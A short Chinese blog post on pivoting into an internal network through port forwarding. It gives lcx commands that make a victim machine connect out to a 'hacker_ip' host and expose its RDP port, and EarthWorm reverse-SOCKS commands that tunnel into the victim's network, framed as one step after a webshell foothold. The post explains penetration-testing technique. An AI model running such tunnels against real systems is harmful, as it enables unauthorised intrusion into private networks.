端口转发

0x00 应用场景

  • 内网IP的80端口通过端口映射到了外网IP的80端口上
  • 内网的Web服务器通过外网IP反向代理(如Nginx) 也就是说Web服务器在内网中

0x01 判断Web是否为内网

  • 向ping域名,查看IP是外网
  • 用webshell查看ip却是内网IP

0x02 端口转发工具

0x03 lcx端口转发

  • Hacker:lcx.exe -listen 500 8888
  • Victim:lcx.exe -slave hacker_ip 500 victim_ip 3389
  • Hacker:cmd mstsc hacker_ip:500

hacker运行lcx vimctim端运行lcx hacker远程连接 hacker远程连接成功

0x04 EarchWorm端口转发

  • Hacker:./ew -s rcsocks -l 1080 -e 8888
  • Victim:./ew -s rssocks -d hacker_ip -e 8888 earchworm原理

    1. 启动EarchWorm

    hacker服务器启动ew victim启动ew victim连接hacker服务器

    2. hacker主机使用代理

    hacker内网主机设置代理1 hacker内网主机设置代理2

    3. hacker内网主机连接目标的内网主机

    hacker连接内网主机 hacker连接内网主机成功

若未作声明则文章版权归本人(@reber)所有,转载请注明原文链接:

可以返回顶部